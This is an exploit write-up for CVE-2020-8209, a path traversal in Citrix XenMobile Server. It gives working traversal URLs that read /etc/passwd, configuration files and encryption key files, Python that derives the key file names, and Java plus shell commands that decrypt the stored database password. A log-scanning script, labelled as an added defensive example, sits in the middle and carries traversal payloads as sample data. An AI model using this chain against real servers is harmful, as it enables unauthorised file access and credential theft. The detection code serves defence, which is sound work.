XenMobile directory traversal to read arbitrary files (CVE-2020-8209)
Using this vulnerability, it is possible to read arbitrary files outside the root directory of the Web server, including configuration files and sensitive encryption keys. No authorization is required.
POC (path traversal)
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
Decrypt configuration password
Read configuration
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
The password is encrypted and stored in one of two formats: {aes}[base64 text] or {aes}{db}[base64 text]. Encryption is handled by the libraries /opt/sas/sw/lib/libsecure.so and DataSecurity.jar; decryption requires the corresponding keys.
The keys are stored in the file /opt/sas/rt/keys/security.properties, which can be downloaded with the same path traversal.
Each of the parameters P.TXT1, P.TXT2 and P.TXT3 from security.properties is hashed with the following algorithm (SHA-256, base64-encoded, with "/" and "=" stripped) to derive the name of its key file.
test.py
```python
from base64 import b64encode
from hashlib import sha256


def key_file_name(value: bytes) -> str:
    # SHA-256 of the parameter value, base64-encoded, with '/' (47) and '=' (61) removed
    return b64encode(sha256(value).digest()).decode('ascii').translate({47: None, 61: None})


# values of P.TXT1, P.TXT2 and P.TXT3 as given in this writeup
for param in (b'xxsbovqwtroclyjdrmgk', b'zxxwzveilgqsxhphdveh', b'pxicutcshrkhkyxpyvdg'):
    print(key_file_name(param))
```
This yields three file names under /opt/sas/rt/keys/ (dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt, +KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt and ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt); download them through the same traversal.
Pitfall: a "+" in the file name must be URL-encoded as %2b (a literal "+" in a query string is decoded as a space).
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/%2bKRGo56ae0r6%2bxnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r%2bgEVGv9%2b8.txt
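As an added example from the defender's side (not part of the original writeup), the code below scans access-log lines for requests to help-sb-download.jsp whose sbFileName, after URL decoding (including the %2b form of "+" noted above and double-encoded "../" segments), resolves outside the directory the JSP serves from. The directory BASE_DIR and the log lines are constructed assumptions; the real download directory is not given in the writeup.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

VULN_PATH = "/jsp/help-sb-download.jsp"
# Assumed directory the JSP serves files from (not stated in the writeup).
BASE_DIR = "/opt/sas/sw/tomcat/inst1/webapps/ROOT/help"

# Combined-format access log lines, constructed for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Aug/2020:10:00:01 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 200 1423
203.0.113.5 - - [10/Aug/2020:10:00:02 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=%2e%2e%2f%2e%2e%2f%2e%2e%2fopt/sas/rt/keys/security.properties HTTP/1.1" 200 812
203.0.113.5 - - [10/Aug/2020:10:00:03 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/%2bKRGo56ae0r6%2bxnuKQZaYkeJSPl5qjqJ5gs459tNg.txt HTTP/1.1" 200 44
198.51.100.7 - - [10/Aug/2020:10:05:00 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=user-guide.pdf HTTP/1.1" 200 99000
198.51.100.7 - - [10/Aug/2020:10:06:00 +0000] "GET /zdm/login.jsp HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def requested_sb_file(target):
    """Decoded sbFileName of a request to the vulnerable JSP, or None for other requests."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("sbFileName")
    if not values:
        return None
    # parse_qs decodes once and turns a literal '+' into a space (the %2b pitfall above);
    # decoding a second time also catches double-encoded sequences such as %252e%252e
    return unquote(values[0])


def escapes_base(sb_file_name, base_dir=BASE_DIR):
    """True if the name resolves outside base_dir (via ../ segments or an absolute path)."""
    resolved = posixpath.normpath(posixpath.join(base_dir, sb_file_name))
    return resolved != base_dir and not resolved.startswith(base_dir + "/")


def find_traversal_attempts(log_text):
    """Return (client_ip, decoded_name, status) for each request that escapes BASE_DIR."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        name = requested_sb_file(m["target"]) if m else None
        if name is not None and escapes_base(name):
            hits.append((m["ip"], name, int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, name, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} requested {name!r} (HTTP {status})")
```

A 200 status on a flagged request means the file was actually served, which is the case to escalate first.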
/opt/sas/sw/lib/libsecure.so
The native encryption library is required as well.
The first task is to save these five files: security.properties, the three key files named above (dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt, +KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt and ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt) and libsecure.so.
Pitfall: these five files must be placed at the same paths they have on the server, i.e. the /opt tree is recreated under the root directory.
Three Java libraries are also needed; save them to a working folder: /opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/DataSecurity.jar, /opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/common-interfaces.jar and /opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/slf4j-api-1.6.4.jar.
In that folder, create a file decrypt.java with the following content and compile it.
```java
import com.citrix.xms.security.DataSecurity;

// Thin wrapper around the product's own DataSecurity.decryptDbPassword()
class decrypt {
    public static void main(String[] args) {
        if (args.length < 1) {
            System.out.println("Usage:\n decrypt [encrypted string]");
            return;
        }
        // expects the {aes}{db}... string from the configuration file
        System.out.println(DataSecurity.decryptDbPassword(args[0]));
    }
}
```
javac -cp DataSecurity.jar decrypt.java
With all the data in place, the password from the configuration file can be decrypted:
```shell
java -cp ./DataSecurity.jar:./common-interfaces.jar:./slf4j-api-1.6.4.jar:. decrypt '{aes}{db}trsPTT4DkG9nMqXpv1Mi8H8nTQBMqqINy+G4VcMgyyE=' 2>/dev/null
```
The default user of the web console is Administrator.
Source article:
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/